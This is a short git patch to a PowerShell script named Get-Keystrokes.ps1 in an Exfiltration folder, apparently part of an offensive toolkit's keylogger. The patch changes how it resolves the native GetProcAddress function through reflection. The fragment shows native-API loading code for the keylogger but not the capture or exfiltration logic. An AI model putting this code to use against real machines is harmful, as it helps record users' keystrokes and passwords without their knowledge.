From 193b9b5bdc59bbd5b40e4f50e8e5334f7562f557 Mon Sep 17 00:00:00 2001
From: p0shkatz <30280007+p0shkatz@users.noreply.github.com>
Date: Fri, 21 Sep 2018 07:42:19 -0500
Subject: [PATCH] Update Get-Keystrokes.ps1

Modified $GetProcAddress definition
---
 Exfiltration/Get-Keystrokes.ps1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1
index 47761b99..6a4f82dd 100644
--- a/Exfiltration/Get-Keystrokes.ps1
+++ b/Exfiltration/Get-Keystrokes.ps1
@@ -108,7 +108,7 @@ function Get-Keystrokes {
             $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
             # Get a reference to the GetModuleHandle and GetProcAddress methods
             $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
             # Get a handle to the module specified
             $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
             $tmpPtr = New-Object IntPtr
@@ -374,4 +374,4 @@ function Get-Keystrokes {
     [void]$PowerShell.BeginInvoke()
 
     if ($PassThru.IsPresent) { return $PowerShell }
-}
\ No newline at end of file
+}